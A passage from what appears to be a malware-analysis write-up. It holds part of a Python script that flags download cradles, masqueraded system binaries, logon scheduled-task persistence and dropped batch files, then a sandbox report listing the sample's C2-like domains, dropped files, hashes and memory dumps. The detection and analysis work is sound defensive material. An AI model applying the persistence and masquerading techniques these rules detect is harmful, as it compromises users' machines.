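            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def masquerade_target(name):
    """Return the Windows binary `name` imitates, or None for a clean name."""
    if name.lower() in LEGIT:
        return None  # an exact, untampered match is not a finding
    folded = name.translate(CONFUSABLES).lower()
    for legit in LEGIT:
        if levenshtein(folded, legit) <= 1:  # one homoglyph or one extra letter
            return legit
    return None

def in_user_writable(path):
    return any(marker in path.lower() for marker in USER_WRITABLE)

def triage(cmd):
    """Return (rule, detail) findings for one command line."""
    findings, names = [], {}
    for url, dest in DOWNLOAD_RE.findall(cmd):
        findings.append(("download_cradle", f"{url} -> {dest}"))
        names[ntpath.basename(dest)] = None
    for path in START_RE.findall(cmd):
        if in_user_writable(path):
            findings.append(("exec_from_user_path", path))
        names[ntpath.basename(path)] = None
    for name in names:  # one masquerading finding per distinct file name
        imitated = masquerade_target(name)
        if imitated:
            findings.append(("masquerading", f"{name} imitates {imitated}"))
    task = SCHTASKS_RE.search(cmd)
    if task:
        args, tr = task.group(1).lower(), TR_RE.search(task.group(1))
        if tr and "/sc onlogon" in args and "/rl highest" in args and in_user_writable(tr.group(1)):
            findings.append(("logon_task_persistence", f"runs {tr.group(1)} at logon, highest privileges"))
    bat = BAT_RE.search(cmd)
    if bat and in_user_writable(bat.group(1)):
        findings.append(("dropped_batch", bat.group(1)))
    delay = TIMEOUT_RE.match(cmd)
    if delay:
        findings.append(("execution_delay", f"timeout {delay.group(1)}s"))
    return findings

def triage_all(cmds):
    """Aggregate findings across command lines: rule -> list of details."""
    summary = {}
    for cmd in cmds:
        for rule, detail in triage(cmd):
            summary.setdefault(rule, []).append(detail)
    return summary

if __name__ == "__main__":
    for rule, details in triage_all(COMMAND_LINES).items():
        print(f"{rule} ({len(details)}):", *details, sep="\n    ")
```

The homoglyph check folds look-alike characters before lower-casing, because lower-casing first turns the capital I in ExpIorer.exe into an ordinary i and hides the trick; the edit-distance fallback catches ExplIorer.exe, which has an extra letter rather than a substituted one. The schtasks rule only fires when the task runs at logon with highest privileges from a user-writable path, which is what separates this persistence from the many legitimate onlogon tasks pointing into Program Files.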

Network

Country Destination Domain Proto
US 8.8.8.8:53 xcu.exgaming.click udp
US 8.8.8.8:53 xcu5.exgaming.click udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp

Files

memory/2192-0-0x0000000000DB0000-0x0000000000DC8000-memory.dmp

memory/2192-1-0x000007FEF5950000-0x000007FEF633C000-memory.dmp

memory/1996-7-0x000000001B850000-0x000000001BB32000-memory.dmp

memory/1996-8-0x0000000001E70000-0x0000000001E78000-memory.dmp

memory/1996-9-0x000007FEEDFB0000-0x000007FEEE94D000-memory.dmp

memory/1996-10-0x0000000002CC0000-0x0000000002D40000-memory.dmp

memory/1996-11-0x000007FEEDFB0000-0x000007FEEE94D000-memory.dmp

memory/1996-12-0x0000000002CC0000-0x0000000002D40000-memory.dmp

memory/1996-13-0x0000000002CC0000-0x0000000002D40000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp3727.tmp.bat

MD5 da995218b014b0710cd684f4b17004d7
SHA1 b2b6678af1b19afc608c6a632be09e975d4d2b75
SHA256 58dc26ec3924579de22168382ad4e3b4aeee714df246c668fefb0d2c8536729f
SHA512 b453fdda361d71ef98a2ad3082c7f7ded4912ddc13ac7af912f52f19ff48f567363a824cf4e94511935b34466fb0fe33437e170a407023e58aae3dab202a300e

memory/2192-23-0x000007FEF5950000-0x000007FEF633C000-memory.dmp

memory/2192-24-0x0000000077590000-0x0000000077739000-memory.dmp

memory/1996-25-0x000007FEEDFB0000-0x000007FEEE94D000-memory.dmp

memory/1996-26-0x0000000002CCB000-0x0000000002D32000-memory.dmp

C:\Users\Admin\AppData\Roaming\system.exe

MD5 a7d63348cfe9b0dc9d3aaec28c76c8f0
SHA1 1b993f554960286e90cfd7cedf4c457e1c46ff80
SHA256 16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54
SHA512 3910836ccae023d562c66bfd754b0d1e3aadc4c1cbf57e96e8220c1de6534a529ec3630d595a7baba7c56ca503b6ce6d012b9c388b9f896f2a0a8be317ca5010

memory/2464-30-0x00000000001D0000-0x00000000001E8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Q125AZ11C0IGZMISVW8E.temp

MD5 5bedae33d43a46d566be309f7a9e8a42
SHA1 fa909fb005d680661b299930127f20a57dacc4ef
SHA256 b43b8da7e86ade79c51c2318fb1a43e6d440a50ecd7bb4b1b1d6e4246647fe34
SHA512 3b98e06f21b1d589cccffd7e546a37c780d22ad58ee2da4e37b39cb798f2555cc1d7281e31a029fe636fdc831edec8e3437f2529c3dfede69a364f9e8a5485ca

C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf

MD5 cf759e4c5f14fe3eec41b87ed756cea8
SHA1 c27c796bb3c2fac929359563676f4ba1ffada1f5
SHA256 c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761
SHA512 c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b

memory/2464-39-0x000007FEF4F60000-0x000007FEF594C000-memory.dmp

memory/3048-38-0x0000000001D80000-0x0000000001D88000-memory.dmp

memory/3048-37-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

memory/3048-41-0x000007FEEDDF0000-0x000007FEEE78D000-memory.dmp

memory/2924-50-0x000007FEEDDF0000-0x000007FEEE78D000-memory.dmp

memory/2464-51-0x000000001ACB0000-0x000000001AD30000-memory.dmp

memory/2924-52-0x0000000002CB0000-0x0000000002D30000-memory.dmp

memory/2924-49-0x0000000002CB0000-0x0000000002D30000-memory.dmp

memory/3048-48-0x0000000002920000-0x00000000029A0000-memory.dmp

memory/3048-47-0x000007FEEDDF0000-0x000007FEEE78D000-memory.dmp

memory/3048-42-0x0000000002920000-0x00000000029A0000-memory.dmp

memory/2924-55-0x0000000002CB0000-0x0000000002D30000-memory.dmp

memory/2464-54-0x0000000077590000-0x0000000077739000-memory.dmp

memory/3048-53-0x0000000002920000-0x00000000029A0000-memory.dmp

memory/3048-57-0x000007FEEDDF0000-0x000007FEEE78D000-memory.dmp

memory/2924-56-0x000007FEEDDF0000-0x000007FEEE78D000-memory.dmp

memory/536-73-0x0000000002DC0000-0x0000000002E40000-memory.dmp

memory/536-76-0x000007FEED450000-0x000007FEEDDED000-memory.dmp

memory/536-75-0x0000000002DC0000-0x0000000002E40000-memory.dmp

memory/536-74-0x000007FEED450000-0x000007FEEDDED000-memory.dmp

memory/1632-72-0x0000000002DF0000-0x0000000002E70000-memory.dmp

memory/1632-71-0x0000000002DF0000-0x0000000002E70000-memory.dmp

memory/1632-70-0x000007FEED450000-0x000007FEEDDED000-memory.dmp

memory/536-78-0x0000000002DC0000-0x0000000002E40000-memory.dmp

memory/1632-77-0x0000000002DF0000-0x0000000002E70000-memory.dmp

memory/1632-69-0x0000000002DF0000-0x0000000002E70000-memory.dmp

memory/1632-64-0x000007FEED450000-0x000007FEEDDED000-memory.dmp

memory/1632-79-0x000007FEED450000-0x000007FEEDDED000-memory.dmp

memory/1996-85-0x0000000002CC0000-0x0000000002D40000-memory.dmp

memory/1100-86-0x000007FEED450000-0x000007FEEDDED000-memory.dmp

memory/1100-87-0x0000000001E70000-0x0000000001EF0000-memory.dmp

memory/1100-88-0x000007FEED450000-0x000007FEEDDED000-memory.dmp

memory/2464-89-0x000007FEF4F60000-0x000007FEF594C000-memory.dmp

memory/1100-91-0x0000000001E70000-0x0000000001EF0000-memory.dmp

memory/1100-90-0x0000000001E70000-0x0000000001EF0000-memory.dmp

memory/1100-93-0x000007FEED450000-0x000007FEEDDED000-memory.dmp

memory/536-92-0x000007FEED450000-0x000007FEEDDED000-memory.dmp

memory/1660-103-0x0000000002D60000-0x0000000002DE0000-memory.dmp

memory/2464-104-0x0000000077590000-0x0000000077739000-memory.dmp

memory/1660-102-0x000007FEEDDF0000-0x000007FEEE78D000-memory.dmp

memory/1660-101-0x0000000002D60000-0x0000000002DE0000-memory.dmp

memory/1660-100-0x000007FEEDDF0000-0x000007FEEE78D000-memory.dmp

memory/2464-99-0x000000001ACB0000-0x000000001AD30000-memory.dmp

memory/1660-105-0x0000000002D60000-0x0000000002DE0000-memory.dmp

memory/1660-106-0x000007FEEDDF0000-0x000007FEEE78D000-memory.dmp

memory/448-112-0x000007FEED450000-0x000007FEEDDED000-memory.dmp

memory/448-113-0x0000000002CB0000-0x0000000002D30000-memory.dmp

memory/448-114-0x000007FEED450000-0x000007FEEDDED000-memory.dmp

memory/448-115-0x0000000002CB0000-0x0000000002D30000-memory.dmp

memory/448-116-0x0000000002CB0000-0x0000000002D30000-memory.dmp